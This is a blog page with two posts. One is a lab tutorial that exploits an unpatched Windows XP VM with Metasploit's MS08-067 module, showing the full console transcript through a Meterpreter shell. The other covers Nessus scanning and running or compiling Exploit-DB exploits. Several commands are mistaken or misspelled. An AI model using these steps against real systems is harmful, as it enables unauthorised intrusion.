EXPLOITASI WINDOWS XP AT VIRTUAL BOX USING METASPLOID

Posted by Dedi Kurniawan on Friday, January 27, 2012 at 1:37 PM
Information Gathering And Service Anumeration

First Instance of all we connect windows xp with batrack
type command ping 192.168.43.1 to connect batrack
 


type command ping 192.168.43.3 to connect windows xp

 
 Next open Zenmap to find out information gathering for more details, we use the auto scan there we can see what services are running ..



Auto Scan

For Vulnerability assessment I using Nessus its the same way that I posted this before open nessus click scan, Add user and input name, input name continued to change policy: Internal network scans,
target scan the contents 192.168.43,0 / 24 ,after the completion of the scan will appear as shown below



Next we chose ip 192.168.43.3 




Here I chose the MS08-07 Microsoft Windows Server service RPC request handling crapted remote code execution.


there exist two possibilities vurnel to know HTML file format download report export there is the 2 hosts 192.168.43.3 click will display a red vurnel







Next into console type msfconsole




Next

msf > use      windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > windows/smb/ms08_067_netapi RHOST=192.168.43.3 p
[-] Unknown command: windows/smb/ms08_067_netapi.
msf  exploit(ms08_067_netapi) > windows/smb/ms08_067_netapi RHOST=192.168.43.3
[-] Unknown command: windows/smb/ms08_067_netapi.
msf  exploit(ms08_067_netapi) > payload rhost 192.168.43.3
[-] Unknown command: payload.
msf  exploit(ms08_067_netapi) > set payload windows/smb/ms08_067_netapi
payload => windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > set rhost 192.168.43.3
rhost => 192.168.43.3
msf  exploit(ms08_067_netapi) > exploit

[-] Exploit failed: undefined method `assoc_exploit=' for #<#<Module:0x8cb7688>::Metasploit3:0xd4f1228>
msf  exploit(ms08_067_netapi) > exploit

[-] Exploit failed: undefined method `assoc_exploit=' for #<#<Module:0x8cb7688>::Metasploit3:0xd433d90>
msf  exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_
set payload windows/meterpreter/bind_ipv6_tcp  set payload windows/meterpreter/bind_nonx_tcp  set payload windows/meterpreter/bind_tcp      
msf  exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_
set payload windows/meterpreter/bind_ipv6_tcp  set payload windows/meterpreter/bind_nonx_tcp  set payload windows/meterpreter/bind_tcp      
msf  exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > set rhost 192.168.43.3
rhost => 192.168.43.3
msf  exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.43.3
[*] Meterpreter session 1 opened (192.168.43.1:56817 -> 192.168.43.3:4444) at 2012-01-28 06:39:25 +0700

meterpreter > dir
[-] Unknown command: dir.
meterpreter > ls

Listing: C:\WINDOWS\system32
============================

Mode              Size      Type  Last modified              Name
----              ----      ----  -------------              ----
100444/r--r--r--  6656      fil   2008-04-15 00:30:00 +0700  KBDAL.DLL
100444/r--r--r--  749       fil   2012-01-24 07:57:53 +0700  sapi.cpl.manifest
100444/r--r--r--  44451     fil   2008-04-15 00:30:00 +0700  rsop.msc
100444/r--r--r--  58273     fil   2008-04-15 00:30:00 +0700  perfmon.msc
100444/r--r--r--  749       fil   2012-01-24 07:57:53 +0700  nwc.cpl.manifest
100444/r--r--r--  749       fil   2012-01-24 07:57:53 +0700  ncpa.cpl.manifest
100444/r--r--r--  488       fil   2012-01-24 07:57:59 +0700  logonui.exe.manifest
100444/r--r--r--  6656      fil   2008-04-15 00:30:00 +0700  kbdycl.dll
100444/r--r--r--  5632      fil   2008-04-15 00:30:00 +0700  kbdycc.dll
100444/r--r--r--  5632      fil   2008-04-15 00:30:00 +0700  kbduzb.dll
100444/r--r--r--  5632      fil   2008-04-15 00:30:00 +0700  kbdur.dll
100444/r--r--r--  6144      fil   2008-04-15 00:30:00 +0700  kbdtuq.dll
100444/r--r--r--  6144      fil   2008-04-15 00:30:00 +0700  kbdtuf.dll
100444/r--r--r--  5632      fil   2008-04-15 00:30:00 +0700  kbdtat.dll



GOOD LUCK
1 comments

Friday, January 27, 2012

SCAN VULNERABILITY ASSESSMENT USING NESSUS

Posted by Dedi Kurniawan at 1:28 PM
Identification Vulnerability

The first open loggin nessus





Next click scan, Add user and input name and ip address after that click launch scan












wait for the procces of his scaning












After procces scaning finised

We can select the ip which one we want to exploit.
For example here i chose the hight at most an easy  note her vulnerabiliti.



 After that it will appear like the image below



From the picture above we can determine its vulner it is SVC Name


We see the picture above there are two vulner here I choose windows Netbios / SMB remote host information Disclosure


 And download report




EXPLOITATION


And know we open exploitdb search


And type command ./searchsploid, and ./searchsploid smb as we select earlier on nessus

 


Enable platforms type ls, ls platforms
If  its format .py we type command python platforms/multiple/dos/1761.py
And if we want to read that file type cat paltform/multiple/13906.txt  
And if we comfile .c type command gcc -c platform/windows/remote/ 13330.c -o black_devil.


 GOOD LUCK










1 comments
Subscribe to: Posts (Atom)